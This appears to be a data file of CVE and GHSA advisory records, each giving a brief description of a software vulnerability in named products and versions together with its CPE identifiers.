A heap-based-buffer-over-read flaw was found in ImageMagick's GetPixelAlpha() function of 'pixel-accessor.h'. This vulnerability is triggered when an attacker passes a specially crafted Tagged Image File Format (TIFF) image to convert it into a PICON file format. This issue can potentially lead to a denial of service and information disclosure.
[]
GHSA-m44m-m7gc-h5p6
The sell function of a smart contract implementation for Target Coin (TGT), a tradable Ethereum ERC20 token, allows a potential trap that could be used to cause financial damage to the seller, because of overflow of the multiplication of its argument amount and a manipulable variable sellPrice, aka the "tradeTrap" issue.
[]
CVE-2022-44120
dedecmdv6 6.1.9 is vulnerable to SQL Injection. via sys_sql_query.php.
[ "cpe:2.3:a:dedebiz:dedecmsv6:6.1.9:*:*:*:*:*:*:*" ]
CVE-2024-23060
TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the ip parameter in the setDmzCfg function.
[ "cpe:2.3:o:totolink:a3300r_firmware:17.0.0cu.557_b20221024:*:*:*:*:*:*:*", "cpe:2.3:h:totolink:a3300r:-:*:*:*:*:*:*:*" ]
GHSA-m9cw-79cj-72f5
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Lenderd 1003 Mortgage Application allows Relative Path Traversal.This issue affects 1003 Mortgage Application: from n/a through 1.75.
[]
CVE-2023-46484
An issue in TOTOlink X6000R V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the setLedCfg function.
[ "cpe:2.3:o:totolink:x6000r_firmware:9.4.0cu.852_b20230719:*:*:*:*:*:*:*", "cpe:2.3:h:totolink:x6000r:-:*:*:*:*:*:*:*" ]
GHSA-mj6m-r9v5-hhc6
dhcpcd before 6.10.0, as used in Android 4.x before 4.4.4, 5.0.x before 5.0.2, 5.1.x before 5.1.1, and 6.x before 2016-04-01 and other products, mismanages option lengths, which allows remote attackers to execute arbitrary code or cause a denial of service (heap-based buffer overflow) via a malformed DHCP response, aka internal bug 26461634.
[]
GHSA-98rf-p4w4-3gc5
The SAP Netweaver Business Warehouse component does not properly restrict access to the functions in the BW-SYS-DB-DB4 function group, which allows remote authenticated users to obtain sensitive information via unspecified vectors.
[]
CVE-2005-4524
Mantis 1.0.0rc3 does not properly handle "Make note private" when a bug is being resolved, which has unknown impact and attack vectors, probably related to an information leak.
[ "cpe:2.3:a:mantis:mantis:1.0.0_rc1:*:*:*:*:*:*:*", "cpe:2.3:a:mantis:mantis:1.0.0_rc2:*:*:*:*:*:*:*", "cpe:2.3:a:mantis:mantis:1.0.0_rc3:*:*:*:*:*:*:*", "cpe:2.3:a:mantis:mantis:1.0.0a1:*:*:*:*:*:*:*", "cpe:2.3:a:mantis:mantis:1.0.0a2:*:*:*:*:*:*:*", "cpe:2.3:a:mantis:mantis:1.0.0a3:*:*:*:*:*:*:*" ]
CVE-2014-6632
Joomla! 2.5.x before 2.5.25, 3.x before 3.2.4, and 3.3.x before 3.3.4 allows remote attackers to authenticate and bypass intended access restrictions via vectors involving LDAP authentication.
[ "cpe:2.3:a:joomla:joomla\\!:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.12:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.13:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.14:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.15:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.16:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.17:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.19:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.20:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.21:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.22:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.23:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.24:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.3.3:*:*:*:*:*:*:*" ]
CVE-2008-5762
Simple Text-File Login Script (SiTeFiLo) 1.0.6 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing the password via a direct request for slog_users.txt.
[ "cpe:2.3:a:mariovaldez:simple_text-file_login_script:1.0.6:*:*:*:*:*:*:*" ]
GHSA-gj48-w74w-8gvm
Path Traversal in TYPO3 Core
Due to a too loose type check in an API method, attackers could bypass the directory traversal check by providing an invalid UTF-8 encoding sequence.
[]
GHSA-xw94-39m9-7c49
An issue was discovered in the size of the default stack guard page on PAX Linux (originally from GRSecurity but shipped by other Linux vendors), specifically the default stack guard page is not sufficiently large and can be "jumped" over (the stack guard page is bypassed), this affects PAX Linux Kernel versions as of June 19, 2017 (specific version information is not available at this time).
[]
CVE-2011-3178
openbuildservice webui code injection
In the web ui of the openbuildservice before 2.3.0 a code injection of the project rebuildtimes statistics could be used by authorized attackers to execute shellcode.
[ "cpe:2.3:o:opensuse:open_build_service:*:*:*:*:*:*:*:*" ]
CVE-2022-4526
django-photologue Default Template photo_detail.html cross site scripting
A vulnerability was found in django-photologue up to 3.15.1 and classified as problematic. Affected by this issue is some unknown functionality of the file photologue/templates/photologue/photo_detail.html of the component Default Template Handler. The manipulation of the argument object.caption leads to cross site scripting. The attack may be launched remotely. Upgrading to version 3.16 is able to address this issue. The name of the patch is 960cb060ce5e2964e6d716ff787c72fc18a371e7. It is recommended to apply a patch to fix this issue. VDB-215906 is the identifier assigned to this vulnerability.
[ "cpe:2.3:a:django-photologue_project:django-photologue:*:*:*:*:*:*:*:*" ]
CVE-2023-31141
OpenSearch issue with fine-grained access control during extremely rare race conditions
OpenSearch is open-source software suite for search, analytics, and observability applications. Prior to versions 1.3.10 and 2.7.0, there is an issue with the implementation of fine-grained access control rules (document-level security, field-level security and field masking) where they are not correctly applied to the queries during extremely rare race conditions potentially leading to incorrect access authorization. For this issue to be triggered, two concurrent requests need to land on the same instance exactly when query cache eviction happens, once every four hours. OpenSearch 1.3.10 and 2.7.0 contain a fix for this issue.
[ "cpe:2.3:a:amazon:opensearch:*:*:*:*:*:docker:*:*", "cpe:2.3:a:amazon:opensearch_security:*:*:*:*:*:*:*:*" ]
GHSA-6g6h-7v62-4x32
An issue discovered in Govee LED Strip v3.00.42 allows attackers to cause a denial of service via crafted Move and MoveWithOnoff commands.
[]
CVE-2022-38476
A data race could occur in the <code>PK11_ChangePW</code> function, potentially leading to a use-after-free vulnerability. In Firefox, this lock protected the data when a user changed their master password. This vulnerability affects Firefox ESR < 102.2 and Thunderbird < 102.2.
[ "cpe:2.3:a:mozilla:firefox_esr:*:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*" ]
CVE-2017-1000471
EmbedThis GoAhead Webserver version 4.0.0 is vulnerable to a NULL pointer dereference in the CGI handler resulting in memory corruption or denial of service.
[ "cpe:2.3:a:embedthis:goahead:4.0.0:*:*:*:*:*:*:*" ]
GHSA-wc97-7623-rxwx
Multiple components in Apache NiFi do not restrict XML External Entity references
Apache NiFi is a system to process and distribute data. Multiple components in Apache NiFi 0.0.1 to 1.16.0 do not restrict XML External Entity references in the default configuration. The Standard Content Viewer service attempts to resolve XML External Entity references when viewing formatted XML files. The following Processors attempt to resolve XML External Entity references when configured with default property values:EvaluateXPathEvaluateXQueryValidateXmlApache NiFi flow configurations that include these Processors are vulnerable to malicious XML documents that contain Document Type Declarations with XML External Entity references. NiFi 1.16.1 disables Document Type Declarations in the default configuration for these Processors and disallows XML External Entity resolution in standard services.
[]
CVE-2019-3844
It was discovered that a systemd service that uses DynamicUser property can get new privileges through the execution of SUID binaries, which would allow to create binaries owned by the service transient group with the setgid bit set. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the GID will be recycled.
[ "cpe:2.3:a:systemd_project:systemd:*:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:hci_management_node:-:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:snapprotect:-:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*", "cpe:2.3:o:netapp:cn1610_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:h:netapp:cn1610:-:*:*:*:*:*:*:*" ]
CVE-2025-31733
WordPress WP Sitemap Plugin <= 1.0.0 - Cross Site Scripting (XSS) vulnerability
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Boot Div WP Sitemap allows Stored XSS. This issue affects WP Sitemap: from n/a through 1.0.0.
[]
GHSA-3qjw-wqhv-r92w
There was a local file disclosure vulnerability in Confluence Server and Confluence Data Center via page exporting. An attacker with permission to editing a page is able to exploit this issue to read arbitrary file on the server under <install-directory>/confluence/WEB-INF directory, which may contain configuration files used for integrating with other services, which could potentially leak credentials or other sensitive information such as LDAP credentials. The LDAP credential will be potentially leaked only if the Confluence server is configured to use LDAP as user repository. All versions of Confluence Server from 6.1.0 before 6.6.16 (the fixed version for 6.6.x), from 6.7.0 before 6.13.7 (the fixed version for 6.13.x), and from 6.14.0 before 6.15.8 (the fixed version for 6.15.x) are affected by this vulnerability.
[]
GHSA-fh63-4r66-jc7v
Cross-site scripting (XSS) in Apache Velocity Tools
The default error page for VelocityView in Apache Velocity Tools prior to 3.1 reflects back the vm file that was entered as part of the URL. An attacker can set an XSS payload file as this vm file in the URL which results in this payload being executed. XSS vulnerabilities allow attackers to execute arbitrary JavaScript in the context of the attacked website and the attacked user. This can be abused to steal session cookies, perform requests in the name of the victim or for phishing attacks.
[]
GHSA-5j55-wx7w-qc49
com.springsource.tcserver.serviceability.rmi.JmxSocketListener in VMware SpringSource tc Server Runtime 6.0.19 and 6.0.20 before 6.0.20.D, and 6.0.25.A before 6.0.25.A-SR01, does not properly enforce the requirement for an encrypted (aka s2enc) password, which allows remote attackers to obtain JMX interface access via a blank password.
[]
CVE-2018-18857
Multiple local privilege escalation vulnerabilities have been identified in the LiquidVPN client through 1.37 for macOS. An attacker can communicate with an unprotected XPC service and directly execute arbitrary OS commands as root or load a potentially malicious kernel extension because com.smr.liquidvpn.OVPNHelper uses the system function to execute the "command_line" parameter as a shell command.
[ "cpe:2.3:a:liquidvpn:liquidvpn:*:*:*:*:*:macos:*:*" ]
CVE-2017-8062
drivers/media/usb/dvb-usb/dw2102.c in the Linux kernel 4.9.x and 4.10.x before 4.10.4 interacts incorrectly with the CONFIG_VMAP_STACK option, which allows local users to cause a denial of service (system crash or memory corruption) or possibly have unspecified other impact by leveraging use of more than one virtual page for a DMA scatterlist.
[ "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*" ]
GHSA-hgm5-j6qc-fwmr
Multiple vulnerabilities in the web-based management interface of Cisco Security Manager could allow an unauthenticated, remote attacker to conduct cross-site scripting attacks against a user of the interface. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.
[]
GHSA-hw66-pxhg-8fx8
DB_LOOKUP in nss_files/files-XXX.c in the Name Service Switch (NSS) in GNU C Library (aka glibc or libc6) 2.21 and earlier does not properly check if a file is open, which allows remote attackers to cause a denial of service (infinite loop) by performing a look-up on a database while iterating over it, which triggers the file pointer to be reset.
[]
CVE-2006-3683
PHP remote file inclusion vulnerability in poll.php in Flipper Poll 1.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the root_path parameter.
[ "cpe:2.3:a:flipper_poll:flipper_poll:*:*:*:*:*:*:*:*" ]
GHSA-qh3m-6928-wcvv
An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1065.
[]
CVE-2010-1186
Cross-site scripting (XSS) vulnerability in xml/media-rss.php in the NextGEN Gallery plugin before 1.5.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the mode parameter.
[ "cpe:2.3:a:alex_rabe:nextgen_gallery:*:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.33:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.34:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.35:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.36:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.37:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.39:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.40:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.41:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.42:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.43:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.50:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.51:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.52:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.60:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.61:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.62:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.63:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.64:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.70:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.71:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.72:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.73:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.74:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.80:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.81:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.82:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.83:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.90:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.91:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.92:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.93:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.94:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.95:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.96:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.97:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.98:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:0.99:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:1.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:1.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:1.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:1.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:alex_rabe:nextgen_gallery:1.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*" ]
CVE-2024-2764
Tenda AC10U SetPptpServerCfg formSetPPTPServer stack-based overflow
A vulnerability, which was classified as critical, was found in Tenda AC10U 15.03.06.48. This affects the function formSetPPTPServer of the file /goform/SetPptpServerCfg. The manipulation of the argument endIP leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257601 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
[ "cpe:2.3:o:tendacn:ac10u_firmware:15.03.06.48_multi_tde01:*:*:*:*:*:*:*", "cpe:2.3:o:tenda:ac10u_firmware:15.03.06.48:*:*:*:*:*:*:*", "cpe:2.3:h:tenda:ac10u:1.0:*:*:*:*:*:*:*" ]
CVE-2023-40136
In setHeader of DialogFillUi.java, there is a possible way to view another user's images due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.
[ "cpe:2.3:o:google:android:11.0:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*" ]
CVE-2024-45714
SolarWinds Serv-U Stored XSS Vulnerability
Application is vulnerable to Cross Site Scripting (XSS) an authenticated attacker with users’ permissions can modify a variable with a payload.
[ "cpe:2.3:a:solarwinds:serv-u:*:*:*:*:*:*:*:*" ]
GHSA-hf4r-6f6g-9rgp
Cross-site scripting (XSS) vulnerability in the manager web interface in mod_cluster before 1.3.2.Alpha1 allows remote attackers to inject arbitrary web script or HTML via a crafted MCMP message.
[]
CVE-2006-1694
SQL injection vulnerability in members.php in XBrite Members 1.1 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter.
[ "cpe:2.3:a:xbrite:xbrite_members:*:*:*:*:*:*:*:*" ]
GHSA-8r47-235m-q27f
A vulnerability, which was classified as critical, has been found in Ruijie RG-UAC up to 20240428. Affected by this issue is some unknown functionality of the file /view/HAconfig/baseConfig/commit.php. The manipulation of the argument peer_ip/local_ip leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263108. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
[]
CVE-2011-3351
openvas-scanner before 2011-09-11 creates a temporary file insecurely when generating OVAL system characteristics document with the ovaldi integrated tool enabled. A local attacker could use this flaw to conduct symlink attacks to overwrite arbitrary files on the system.
[ "cpe:2.3:a:openvas:openvas-scanner:*:*:*:*:*:*:*:*" ]
CVE-2020-10388
The way the Referer header in article.php is handled in Chadha PHPKB Standard Multi-Language 9 allows attackers to execute Stored (Blind) XSS (injecting arbitrary web script or HTML) in admin/report-referrers.php (vulnerable file admin/include/functions-articles.php).
[ "cpe:2.3:a:chadhaajay:phpkb:9.0:*:*:*:*:*:*:*" ]
CVE-2008-5074
SQL injection vulnerability in index.php in the Freshlinks 1.0 RC1 module for PHP-Fusion allows remote attackers to execute arbitrary SQL commands via the linkid parameter.
[ "cpe:2.3:a:php-fusion:freshlinks_module:1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php-fusion:php-fusion:*:*:*:*:*:*:*:*" ]
CVE-2024-43767
In prepare_to_draw_into_mask of SkBlurMaskFilterImpl.cpp, there is a possible heap overflow due to improper input validation. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.
[]
CVE-2024-43401
In XWiki Platform, payloads stored in content is executed when a user with script/programming right edit them
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. A user without script/programming right can trick a user with elevated rights to edit a content with a malicious payload using a WYSIWYG editor. The user with elevated rights is not warned beforehand that they are going to edit possibly dangerous content. The payload is executed at edit time. This vulnerability has been patched in XWiki 15.10RC1.
[ "cpe:2.3:a:xwiki:xwiki-platform:*:*:*:*:*:*:*:*", "cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*" ]
CVE-2023-1464
SourceCodester Medicine Tracker System improper authentication
A vulnerability, which was classified as critical, was found in SourceCodester Medicine Tracker System 1.0. This affects an unknown part of the file Users.php?f=save_user. The manipulation of the argument firstname/middlename/lastname/username/password leads to improper authentication. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-223311.
[ "cpe:2.3:a:medicine_tracker_system_project:medicine_tracker_system:1.0:*:*:*:*:*:*:*" ]
CVE-2021-37174
A vulnerability has been identified in RUGGEDCOM ROX MX5000 (All versions < V2.14.1), RUGGEDCOM ROX RX1400 (All versions < V2.14.1), RUGGEDCOM ROX RX1500 (All versions < V2.14.1), RUGGEDCOM ROX RX1501 (All versions < V2.14.1), RUGGEDCOM ROX RX1510 (All versions < V2.14.1), RUGGEDCOM ROX RX1511 (All versions < V2.14.1), RUGGEDCOM ROX RX1512 (All versions < V2.14.1), RUGGEDCOM ROX RX1524 (All versions < V2.14.1), RUGGEDCOM ROX RX1536 (All versions < V2.14.1), RUGGEDCOM ROX RX5000 (All versions < V2.14.1). The affected devices have a privilege escalation vulnerability, if exploited, an attacker could gain root user access.
[ "cpe:2.3:o:siemens:ruggedcom_rox_rx1400_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:siemens:ruggedcom_rox_rx1400:-:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:ruggedcom_rox_mx5000_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:siemens:ruggedcom_rox_mx5000:-:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:ruggedcom_rox_rx1500_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:siemens:ruggedcom_rox_rx1500:-:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:ruggedcom_rox_rx1501_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:siemens:ruggedcom_rox_rx1501:-:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:ruggedcom_rox_rx1510_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:siemens:ruggedcom_rox_rx1510:-:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:ruggedcom_rox_rx1511_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:siemens:ruggedcom_rox_rx1511:-:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:ruggedcom_rox_rx1512_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:siemens:ruggedcom_rox_rx1512:-:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:ruggedcom_rox_rx1524_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:siemens:ruggedcom_rox_rx1524:-:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:ruggedcom_rox_rx1536_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:siemens:ruggedcom_rox_rx1536:-:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:ruggedcom_rox_rx5000_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:siemens:ruggedcom_rox_rx5000:-:*:*:*:*:*:*:*" ]
GHSA-vmv9-94fj-qx95
IBM Security QRadar SIEM 7.2.x before 7.2.7 allows remote authenticated administrators to read arbitrary files via XML data containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.
[]
CVE-2024-50302
HID: core: zero-initialize the report buffer
In the Linux kernel, the following vulnerability has been resolved: HID: core: zero-initialize the report buffer Since the report buffer is used by all kinds of drivers in various ways, let's zero-initialize it during allocation to make sure that it can't be ever used to leak kernel memory via specially-crafted report.
[ "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:6.12:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:6.12:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:6.12:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:6.12:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:6.12:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:6.12:rc6:*:*:*:*:*:*" ]
GHSA-2chv-87wj-pjv2
OHDSI WebAPI vulnerable to SQL Injection
Observational Health Data Sciences and Informatics (OHDSI) WebAPI before 2.7.2 allows SQL injection in `FeatureExtractionService.java`.
[]